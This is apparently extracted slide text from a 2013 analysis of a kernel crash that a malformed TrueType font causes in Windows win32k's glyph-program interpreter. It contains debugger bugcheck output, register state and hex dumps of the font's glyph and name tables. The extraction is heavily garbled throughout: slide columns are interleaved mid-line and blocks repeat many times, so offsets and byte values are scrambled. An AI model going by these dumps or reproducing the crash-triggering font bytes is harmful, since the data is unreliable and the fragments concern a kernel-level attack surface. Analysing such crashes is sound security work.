Friday, March 8, 2013 00 00 00 00 00 03 ba d0 7f 06 e9 00 00 00 01 0c 18 d3 69 4b 00 03 ba e4 00 00 00 02 66 70 67 6d 00 03 b8 9b 67 6c 79 66 00 00 00 bc 68 65 61 64 |............fpgm| |............glyf| |..iK........head| 00 00 00 45 42 b0 42 78 03 00 42 b5 44 00 00 00 00 00 b0 43 78 b0 43 b0 b0 31 03 45 03 00 00 00 |................| |.^..............| |......BN..CEM..C| |Ea..#x..C..` ..#| |B.Pa...#x.....C | |..a ..aE..#BE..#| |BE..#B..C..P\..#| |x..C..Ca..#x..C.| |.Ca\.+#x..C..` .| |.#B.Pa\.1#x....C| |B....CB....CEB..| |....C..`E.P`..C#| |D.....C..CD17...| |.....f.........f| |.............f..| |.........r......| 00 5e a9 61 b0 01 45 b0 43 23 b0 1c b0 00 00 01 00 00 b0 b0 50 61 b0 01 61 42 02 b0 01 00 00 04 00 00 00 17 61 20 03 43 5c b0 b0 00 1f 08 03 09 00 00 b0 23 b8 b0 23 b0 b0 50 03 43 b0 00 00 00 00 01 00 78 ff 01 42 02 2b 61 43 b0 00 66 01 02 00000: 00002: 00004: 00005: 00006: 00008: 00009: 0000A: 0000B: 00 00 42 b0 df 61 b0 43 23 5c 42 03 43 00 04 00 00 00 4e 00 23 45 01 61 78 b0 b0 60 b0 03 09 0e 00 00 00 b0 b0 01 b0 0d 00 23 b0 b0 43 01 01 72 PUSHB 0 PUSHB 0 WS FLIPOFF PUSHB 0 RS RCVT FLIPON PUSHB 0 00 00 43 01 80 23 00 23 43 78 00 50 44 04 00 00 00 01 45 60 1c 42 50 78 b0 b0 43 60 31 09 0c 03 00 00 4d 20 b0 45 5c b0 01 01 45 b0 37 00 00 00 00 01 b0 b0 00 b0 b0 01 60 b0 42 00 01 00 66 01 00 00 00 00 43 02 18 43 20 02 b8 43 01 00 00 04 00 01 43 23 20 23 23 b0 b0 43 ff 23 00 66 03 09 LAST_CONTROL_TRANSFER: STACK_TEXT: WARNING: Frame IP b207a9a0 bf85bff7 b207a9c8 bf85f92f b207a9fc bf862709 b207aa94 bf85e8bc BUCKET_ID: from bf85bff7 to e2482368 not in any known module. Following frames may be wrong. 
013abaf2 013abb9b e2481f84 0xe2482368 013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103 e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c Followup: MachineOwner --------kd> .tss 0x28 eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94 eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 e2482368 e8fbffffff call e2482368 kd> D 013abaf2 013abaf2 b0 00 013abb02 b0 17 013abb12 50 61 013abb22 61 20 013abb32 b0 03 013abb42 01 43 013abb52 61 5c 013abb62 42 b0 Friday, March 8, 2013 b0 23 b8 b0 23 b0 b0 50 00 78 ff 01 42 02 2b 61 42 b0 df 61 b0 43 23 5c 4e 00 23 45 01 61 78 b0 b0 43 78 b0 43 b0 b0 31 00-43 b0-01 b0-80 01-23 b0-00 0d-23 00-43 23-78 45 60 1c 42 50 78 b0 b0 4d 20 b0 45 5c b0 01 01 b0 b0 00 b0 b0 01 60 b0 00 00 43 02 18 43 20 02 43 23 20 23 23 b0 b0 43 45 42 b0 42 78 03 00 42 61 b0 01 45 b0 43 23 b0 ....BN..CEM..CEa ..#x..C..` ..#B. Pa...#x.....C .. a ..aE..#BE..#BE ..#B..C..P\..#x. .C..Ca..#x..C..C a\.+#x..C..` ..# B.Pa\.1#x....CB. LAST_CONTROL_TRANSFER: STACK_TEXT: WARNING: Frame IP b207a9a0 bf85bff7 b207a9c8 bf85f92f b207a9fc bf862709 b207aa94 bf85e8bc BUCKET_ID: from bf85bff7 to e2482368 not in any known module. Following frames may be wrong. 
013abaf2 013abb9b e2481f84 0xe2482368 013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103 e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c The pointer argument to Followup: MachineOwner --------- win32k!itrp_ExecuteGlyphPgm kd> .tss 0x28 eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94 eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 e2482368 e8fbffffff call e2482368 kd> D 013abaf2 013abaf2 b0 00 013abb02 b0 17 013abb12 50 61 013abb22 61 20 013abb32 b0 03 013abb42 01 43 013abb52 61 5c 013abb62 42 b0 Friday, March 8, 2013 b0 23 b8 b0 23 b0 b0 50 00 78 ff 01 42 02 2b 61 42 b0 df 61 b0 43 23 5c 4e 00 23 45 01 61 78 b0 b0 43 78 b0 43 b0 b0 31 00-43 b0-01 b0-80 01-23 b0-00 0d-23 00-43 23-78 45 60 1c 42 50 78 b0 b0 4d 20 b0 45 5c b0 01 01 b0 b0 00 b0 b0 01 60 b0 00 00 43 02 18 43 20 02 43 23 20 23 23 b0 b0 43 45 42 b0 42 78 03 00 42 61 b0 01 45 b0 43 23 b0 ....BN..CEM..CEa ..#x..C..` ..#B. Pa...#x.....C .. a ..aE..#BE..#BE ..#B..C..P\..#x. .C..Ca..#x..C..C a\.+#x..C..` ..# B.Pa\.1#x....CB. LAST_CONTROL_TRANSFER: STACK_TEXT: WARNING: Frame IP b207a9a0 bf85bff7 b207a9c8 bf85f92f b207a9fc bf862709 b207aa94 bf85e8bc BUCKET_ID: from bf85bff7 to e2482368 not in any known module. Following frames may be wrong. 
013abaf2 013abb9b e2481f84 0xe2482368 013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103 e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c Followup: MachineOwner 00000: PUSHB 0 --------00002: PUSHB 0 The pointer argument to win32k!itrp_ExecuteGlyphPgm 00004: WS kd> .tss 0x28 00005: FLIPOFF eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94 00006: PUSHB 0 eip=e2482368 esp=b2077000 00008: RSebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc 00009: RCVT cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 e2482368 e8fbffffff0000A: FLIPON call e2482368 0000B: PUSHB 0 ... kd> D 013abaf2 013abaf2 013abb02 013abb12 013abb22 013abb32 013abb42 013abb52 013abb62 Friday, March 8, 2013 b0 b0 50 61 b0 01 61 42 00 17 61 20 03 43 5c b0 b0 23 b8 b0 23 b0 b0 50 00 78 ff 01 42 02 2b 61 42 b0 df 61 b0 43 23 5c 4e 00 23 45 01 61 78 b0 b0 43 78 b0 43 b0 b0 31 00-43 b0-01 b0-80 01-23 b0-00 0d-23 00-43 23-78 45 60 1c 42 50 78 b0 b0 4d 20 b0 45 5c b0 01 01 b0 b0 00 b0 b0 01 60 b0 00 00 43 02 18 43 20 02 43 23 20 23 23 b0 b0 43 GLYF Program from TTF 45 42 b0 42 78 03 00 42 61 b0 01 45 b0 43 23 b0 ....BN..CEM..CEa ..#x..C..` ..#B. Pa...#x.....C .. a ..aE..#BE..#BE ..#B..C..P\..#x. .C..Ca..#x..C..C a\.+#x..C..` ..# B.Pa\.1#x....CB. LAST_CONTROL_TRANSFER: STACK_TEXT: WARNING: Frame IP b207a9a0 bf85bff7 b207a9c8 bf85f92f b207a9fc bf862709 b207aa94 bf85e8bc BUCKET_ID: from bf85bff7 to e2482368 not in any known module. Following frames may be wrong. 013abaf2 013abb9b e2481f84 0xe2482368 013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103 e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c Ok, so what’s this? 
Followup: MachineOwner --------- kd> .tss 0x28 eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94 eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 e2482368 e8fbffffff call e2482368 kd> D 013abb9b 013abb9b 31 37 013abbab 09 00 013abbbb 0c 00 013abbcb 03 00 013abbdb 09 00 013abbeb 18 00 013abbfb 03 00 013abc0b 70 00 Friday, March 8, 2013 01 00 66 01 04 9c 01 79 01 00 00 04 00 00 04 00 00 66 03 09 0c 03 09 72 00 00 00 00 00 00 00 00 00 00 01 03 66 01 07 69 00-08 00-03 04-09 00-1c 00-03 04-09 00-62 00-67 00 00 00 00 00 00 00 00 66 01 02 80 01 06 b4 68 00 04 00 00 04 00 00 00 03 09 0e 03 09 0c 43 74 00 00 00 00 00 00 00 00 01 01 72 01 05 66 6f 20 04 00 00 04 00 00 00 00 17........f..... ....f........... ..f...........r. ................ ......f......... ..............f. ........b...C.o. p.y.r.i.g.h.t. . LAST_CONTROL_TRANSFER: STACK_TEXT: WARNING: Frame IP b207a9a0 bf85bff7 b207a9c8 bf85f92f b207a9fc bf862709 b207aa94 bf85e8bc BUCKET_ID: from bf85bff7 to e2482368 not in any known module. Following frames may be wrong. 013abaf2 013abb9b e2481f84 0xe2482368 013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103 e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c Ok, so what’s this? Followup: MachineOwner --------- kd> .tss 0x28 eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94 eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 e2482368 e8fbffffff call e2482368 Points to the exact end of the GLYF instruction array kd> D 013abb9b 013abb9b 31 37 01 01 00 00 00 00-08 00 66 00 03 00 01 04 17........f..... (3BAE4+A9) 013abbab 09 00 00 00 66 00 00 00-03 00 01 04 09 00 01 00 ....f........... 
013abbbb 013abbcb 013abbdb 013abbeb 013abbfb 013abc0b Friday, March 8, 2013 0c 03 09 18 03 70 00 00 00 00 00 00 66 01 04 9c 01 79 00 04 00 00 04 00 03 09 0c 03 09 72 00 00 00 00 00 00 01 03 66 01 07 69 04-09 00-1c 00-03 04-09 00-62 00-67 00 00 00 00 00 00 02 80 01 06 b4 68 00 00 04 00 00 00 0e 03 09 0c 43 74 00 00 00 00 00 00 72 01 05 66 6f 20 00 04 00 00 00 00 ..f...........r. ................ ......f......... ..............f. ........b...C.o. p.y.r.i.g.h.t. . ... 00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm| 00000070 7f 06 e9 00 00 from 00 01bf85bff7 0c 00 03 9b 67 6c 79 66 |............glyf| LAST_CONTROL_TRANSFER: to b8 e2482368 00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head| ... STACK_TEXT: 0003bad0 00 00 IP 00 not 00 00 00 00 00 00 Following 00 00 00 00 00 |................| WARNING: Frame in 00 any00known module. frames may be wrong. 0003bae0 00 5e 00 00 00 01 00 00 00 00 00 01 00 01 00 01 |.^..............| b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368 0003baf0 00 a9 b0 013abaf2 00 b0 00 013abb9b 42 4e b0e2481f84 00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c 4d b0 00 43 |......BN..CEM..C| b207a9c8 bf85f92f 0003bb00 45 61 b0 e248155c 17 23 78 00000001 b0 00 4300000000 b0 01 60win32k!fsg_SimpleInnerGridFit+0x103 20 b0 00 23 |Ea..#x..C..` ..#| b207a9fc bf862709 0003bb40 78 b0 01 e2481248 43 b0 02 e2481774 43 61 b0e2481f84 0d 23 78win32k!fsg_ExecuteGlyph+0x1d3 b0 01 43 b0 |x..C..Ca..#x..C.| b207aa94 bf85e8bc 0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..| 0003bb80 1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#| BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c 0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...| 0003bba0 00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f| Followup: 00 MachineOwner 0003bbb0 --------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..| 0003bbc0 00 01 04 09 00 02 00 0e 00 72 
00 03 00 01 04 09 |.........r......| 0003bbd0 00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................| kd> .tss 0x28 0003bbe0 00 66 00 03 00 01ecx=e2482084 04 09 00 05edx=00000001 00 18 00 9c esi=e2481fe0 00 03 |.f..............| eax=e2481f84 ebx=e2481afc edi=013abb94 0003bbf0 00 01 04 09 00 06 00 0c 00 66 00 03 00 01 04 09 |.........f......| eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc 0003bc00 00 07 00 62 00 b4 00 43 00 6f 00 70 00 79 00 72 |...b...C.o.p.y.r| cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 0003bc10 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 32 |.i.g.h.t. ... .2| e2482368 e8fbffffff call e2482368 ... kd> D 013abb9b 013abb9b 31 37 013abbab 09 00 013abbbb 0c 00 013abbcb 03 00 013abbdb 09 00 013abbeb 18 00 013abbfb 03 00 013abc0b 70 00 Friday, March 8, 2013 Another Look At TTF 01 00 66 01 04 9c 01 79 01 00 00 04 00 00 04 00 00 66 03 09 0c 03 09 72 00 00 00 00 00 00 00 00 00 00 01 03 66 01 07 69 00-08 00-03 04-09 00-1c 00-03 04-09 00-62 00-67 00 00 00 00 00 00 00 00 66 01 02 80 01 06 b4 68 00 04 00 00 04 00 00 00 03 09 0e 03 09 0c 43 74 00 00 00 00 00 00 00 00 01 01 72 01 05 66 6f 20 04 00 00 04 00 00 00 00 17........f..... ....f........... ..f...........r. ................ ......f......... ..............f. ........b...C.o. p.y.r.i.g.h.t. . ... 00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm| 00000070 7f 06 e9 00 00 from 00 01bf85bff7 0c 00 03 9b 67 6c 79 66 |............glyf| LAST_CONTROL_TRANSFER: to b8 e2482368 00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head| ... STACK_TEXT: 0003bad0 00 00 IP 00 not 00 00 00 00 00 00 Following 00 00 00 00 00 |................| WARNING: Frame in 00 any00known module. frames may be wrong. 
0003bae0 00 5e 00 00 00 01 00 00 00 00 00 01 00 01 00 01 |.^..............| b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368 0003baf0 00 a9 b0 013abaf2 00 b0 00 013abb9b 42 4e b0e2481f84 00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c 4d b0 00 43 |......BN..CEM..C| b207a9c8 bf85f92f 0003bb00 45 61 b0 e248155c 17 23 78 00000001 b0 00 4300000000 b0 01 60win32k!fsg_SimpleInnerGridFit+0x103 20 b0 00 23 |Ea..#x..C..` ..#| b207a9fc bf862709 0003bb40 78 b0 01 e2481248 43 b0 02 e2481774 43 61 b0e2481f84 0d 23 78win32k!fsg_ExecuteGlyph+0x1d3 b0 01 43 b0 |x..C..Ca..#x..C.| b207aa94 bf85e8bc 0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..| 0003bb80 1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#| BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c 0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...| 0003bba0 00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f| Followup: 00 MachineOwner 0003bbb0 --------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..| 0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......| 0003bbd0 00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................| kd> .tss 0x28 0003bbe0 00 66 00 03 00 01ecx=e2482084 04 09 00 05edx=00000001 00 18 00 9c esi=e2481fe0 00 03 |.f..............| eax=e2481f84 ebx=e2481afc edi=013abb94 0003bbf0 00 01 04 09 00 06 00 0c 00 66 00 03 00 01 04 09 |.........f......| eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc 0003bc00 00 07 00 62 00 b4 00 43 00 6f 00 70 00 79 00 72 |...b...C.o.p.y.r| cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 0003bc10 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 32 |.i.g.h.t. ... .2| e2482368 e8fbffffff call e2482368 ... 
GLYF is 188 bytes 3BAE4+BC=3BBA0 = start of NAME record kd> D 013abb9b 013abb9b 31 37 013abbab 09 00 013abbbb 0c 00 013abbcb 03 00 013abbdb 09 00 013abbeb 18 00 013abbfb 03 00 013abc0b 70 00 Friday, March 8, 2013 Another Look At TTF 01 00 66 01 04 9c 01 79 01 00 00 04 00 00 04 00 00 66 03 09 0c 03 09 72 00 00 00 00 00 00 00 00 00 00 01 03 66 01 07 69 00-08 00-03 04-09 00-1c 00-03 04-09 00-62 00-67 00 00 00 00 00 00 00 00 66 01 02 80 01 06 b4 68 00 04 00 00 04 00 00 00 03 09 0e 03 09 0c 43 74 00 00 00 00 00 00 00 00 01 01 72 01 05 66 6f 20 04 00 00 04 00 00 00 00 17........f..... ....f........... ..f...........r. ................ ......f......... ..............f. ........b...C.o. p.y.r.i.g.h.t. . ... 00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm| 00000070 7f 06 e9 00 00 from 00 01bf85bff7 0c 00 03 9b 67 6c 79 66 |............glyf| LAST_CONTROL_TRANSFER: to b8 e2482368 00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head| ... STACK_TEXT: 0003bad0 00 00 IP 00 not 00 00 00 00 00 00 Following 00 00 00 00 00 |................| WARNING: Frame in 00 any00known module. frames may be wrong. 
0003bae0 00 5e 00 00 00 01 00 00 00 00 00 01 00 01 00 01 |.^..............| b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368 0003baf0 00 a9 b0 013abaf2 00 b0 00 013abb9b 42 4e b0e2481f84 00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c 4d b0 00 43 |......BN..CEM..C| b207a9c8 bf85f92f 0003bb00 45 61 b0 e248155c 17 23 78 00000001 b0 00 4300000000 b0 01 60win32k!fsg_SimpleInnerGridFit+0x103 20 b0 00 23 |Ea..#x..C..` ..#| b207a9fc bf862709 0003bb40 78 b0 01 e2481248 43 b0 02 e2481774 43 61 b0e2481f84 0d 23 78win32k!fsg_ExecuteGlyph+0x1d3 b0 01 43 b0 |x..C..Ca..#x..C.| b207aa94 bf85e8bc 0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..| 0003bb80 1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#| BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c 0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...| 0003bba0 00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f| Followup: 00 MachineOwner 0003bbb0 --------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..| 0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......| 0003bbd0 00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................| kd> .tss 0x28 0003bbe0 00 66 00 03 00 01ecx=e2482084 04 09 00 05edx=00000001 00 18 00 9c esi=e2481fe0 00 03 |.f..............| eax=e2481f84 ebx=e2481afc edi=013abb94 0003bbf0 00 01 04 09 00 06 00 0c 00 66 00 03 00 01 04 09 |.........f......| eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac pe nc 0003bc00 00 07 00 62 00 b4 00 43 00 6f 00 70 00 79 00 72 |...b...C.o.p.y.r| cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 0003bc10 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 32 |.i.g.h.t. ... .2| e2482368 e8fbffffff call e2482368 ... 
I’ll explain these later This is the ‘flags’ field kd> D 013abb9b 013abb9b 31 37 013abbab 09 00 013abbbb 0c 00 013abbcb 03 00 013abbdb 09 00 013abbeb 18 00 013abbfb 03 00 013abc0b 70 00 Friday, March 8, 2013 01 00 66 01 04 9c 01 79 01 00 00 04 00 00 04 00 00 66 03 09 0c 03 09 72 00 00 00 00 00 00 00 00 00 00 01 03 66 01 07 69 00-08 00-03 04-09 00-1c 00-03 04-09 00-62 00-67 00 00 00 00 00 00 00 00 66 01 02 80 01 06 b4 68 00 04 00 00 04 00 00 00 03 09 0e 03 09 0c 43 74 00 00 00 00 00 00 00 00 01 01 72 01 05 66 6f 20 04 00 00 04 00 00 00 00 17........f..... ....f........... ..f...........r. ................ ......f......... ..............f. ........b...C.o. p.y.r.i.g.h.t. . ... 00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm| 00000070 7f 06 e9 00 00 from 00 01bf85bff7 0c 00 03 9b 67 6c 79 66 |............glyf| LAST_CONTROL_TRANSFER: to b8 e2482368 00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head| ... STACK_TEXT: 0003bad0 00 00 IP 00 not 00 00 00 00 00 00 Following 00 00 00 00 00 |................| WARNING: Frame in 00 any00known module. frames may be wrong. 0003bae0 00 5e 00 00 00 01 00 00 00 00 00 01 00 01 00 01 |.^..............| b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368 0003baf0 00 a9 b0 013abaf2 00 b0 00 013abb9b 42 4e b0e2481f84 00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c 4d b0 00 43 |......BN..CEM..C| b207a9c8 bf85f92f 0003bb00 45 61 b0 e248155c 17 23 78 00000001 b0 00 4300000000 b0 01 60win32k!fsg_SimpleInnerGridFit+0x103 20 b0 00 23 |Ea..#x..C..` ..#| b207a9fc bf862709 0003bb40 78 b0 01 e2481248 43 b0 02 e2481774 43 61 b0e2481f84 0d 23 78win32k!fsg_ExecuteGlyph+0x1d3 b0 01 43 b0 |x..C..Ca..#x..C.| b207aa94 bf85e8bc (The author is dyslexic?) 
0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..| 0003bb80 1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#| BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c 0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...| 0003bba0 00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f| Followup: 00 MachineOwner 0003bbb0 --------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..| 0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......| 0003bbd0 00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................| kd> .tss 0x28 0003bbe0 00 66 00 03'glyf' 00 01ecx=e2482084 04 09 00 00 18Data 00 9c[...] 00 03 |.f..............| Table - 05 Glyph eax=e2481f84 ebx=e2481afc edx=00000001 esi=e2481fe0 edi=013abb94 0003bbf0 00 01 04 09 00 06 00 0c 00 66 00 03 00 01 04 09 |.........f......| eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei nglen nz ac pe nc Glyph 5:00 off = 79 0x00000000, = 188 0003bc00 00 07 00 62 00 b4 00 43 00 6f 70 00 00 72 |...b...C.o.p.y.r| cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 [...] Length of Instructions: 169 0003bc10 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 32 |.i.g.h.t. ... .2| e2482368 e8fbffffff call e2482368 [...] ... What could 0x3137 possibly mean? The flags don’t actually make any sense. kd> D 013abb9b 013abb9b 31 37 013abbab 09 00 013abbbb 0c 00 013abbcb 03 00 013abbdb 09 00 013abbeb 18 00 013abbfb 03 00 013abc0b 70 00 Friday, March 8, 2013 00167: RS WCVTP 01 01 00 00 0000168: 00-08 00 66 00 03 00 01 04 00 66 01 04 9c 01 79 00 00 04 00 00 04 00 66 03 09 0c 03 09 72 00 00 00 00 00 00 00 00 00-03 01Flags 04-09 03 00-1c ----66 00-03 0: 01 04-09 1: 07 00-62 69 00-67 00 01 04 09 00 00 02 00 0e 00 00 80 00 03 00 00 01 04 09 00 YDual XDual 00 06 00 0c 00 YDual XDual 00 b4 00 43 00 00 68 00 74 00 01 72 01 05 66 6f 20 00 00 04 00 00 00 00 17........f..... ....f........... ..f...........r. ................ ......f......... 
..............f. Y-Short X-Short ........b...C.o. p.y.r.i.g.h.t. . On On ... 00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm| 00000070 7f 06 e9 00 00 from 00 01bf85bff7 0c 00 03 9b 67 6c 79 66 |............glyf| LAST_CONTROL_TRANSFER: to b8 e2482368 00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head| ... STACK_TEXT: 0003bad0 00 00 IP 00 not 00 00 00 00 00 00 Following 00 00 00 00 00 |................| WARNING: Frame in 00 any00known module. frames may be wrong. 0003bae0 00 5e 00 00 00 01 00 00 00 00 00 01 00 01 00 01 |.^..............| b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368 0003baf0 00 a9 b0 013abaf2 00 b0 00 013abb9b 42 4e b0e2481f84 00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c 4d b0 00 43 |......BN..CEM..C| b207a9c8 bf85f92f 0003bb00 45 61 b0 e248155c 17 23 78 00000001 b0 00 4300000000 b0 01 60win32k!fsg_SimpleInnerGridFit+0x103 20 b0 00 23 |Ea..#x..C..` ..#| b207a9fc bf862709 0003bb40 78 b0 01 e2481248 43 b0 02 e2481774 43 61 b0e2481f84 0d 23 78win32k!fsg_ExecuteGlyph+0x1d3 b0 01 43 b0 |x..C..Ca..#x..C.| b207aa94 bf85e8bc (The author is dyslexic?) 0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..| 0003bb80 1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#| BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c 0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...| 0003bba0 00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f| Followup: 00 MachineOwner 0003bbb0 --------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..| 0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......| 0003bbd0 00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................| kd> .tss 0x28 0003bbe0 00 66 00 03'glyf' 00 01ecx=e2482084 04 09 00 00 18Data 00 9c[...] 
Table 05: Glyph
Glyph 5: off = 79, len = 188
Length of Instructions: 169

[...]                                                  00 03  |.f..............|
0003bbf0  00 01 04 09 00 06 00 0c 00 66 00 03 00 01 04 09  |.........f......|
0003bc00  00 07 00 62 00 b4 00 43 00 6f 00 70 00 79 00 72  |...b...C.o.p.y.r|
0003bc10  00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 32  |.i.g.h.t. ... .2|
[...]

TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0         nv up ei ng nz ac pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010296
e2482368 e8fbffffff      call    e2482368

What could 0x3137 possibly mean? The flags don't actually make any sense.

kd> D 013abb9b
013abb9b  31 37 01 01 00 00 00 00-08 00 66 00 03 00 01 04  17........f.....
013abbab  09 00 00 00 66 00 00 00-03 00 01 04 09 00 01 00  ....f...........
